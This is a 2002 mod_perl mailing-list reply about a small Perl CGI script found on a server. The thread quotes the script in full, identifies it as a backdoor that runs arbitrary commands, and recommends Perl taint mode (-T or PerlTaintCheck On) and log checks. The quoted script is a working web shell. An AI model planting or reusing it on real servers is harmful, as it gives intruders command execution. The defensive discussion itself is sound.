>>Chris Reinhardt wrote: >> >>>On Thu, 21 Mar 2002, John Michael wrote: >>> >>> >>> >>>>#!/usr/bin/perl >>>>use CGI qw(:standard); >>>>print header; >>>>my $k=param("g"); >>>>my $a=param("s"); >>>>if ($a || $k) { >>>> $l=`$k 2>&1`; >>>> print start_form,textarea("g",$k,1,50); >>>> print submit("sc"); >>>> print end_form; >>>> print pre($l); >>>>} >>>>print $ENV{"SERVER_NAME"}; >>>> >>> >>>It executes arbitrary commands as <whatever your httpds run as>. >> >>don't delete it, but add the -T flag >> >>#!/usr/bin/perl -T >> >>In addition for the hacker not being able to run anything and probably >>not understanding why, you will be able to check the logs to see what IP >>the script was called from and hopefully trace down the bugger.
Of course as Tom Brown has whispered to my ear, you simply need to run your code with PerlTaintCheck On, without modifying the script. or taking it off depending on what you want to achieve. _____________________________________________________________________ Stas Bekman JAm_pH -- Just Another mod_perl Hacker http://stason.org/ mod_perl Guide http://perl.apache.org/guide mailto:[EMAIL PROTECTED] http://ticketmaster.com http://apacheweek.com http://singlesheaven.com http://perl.apache.org http://perlmonth.com/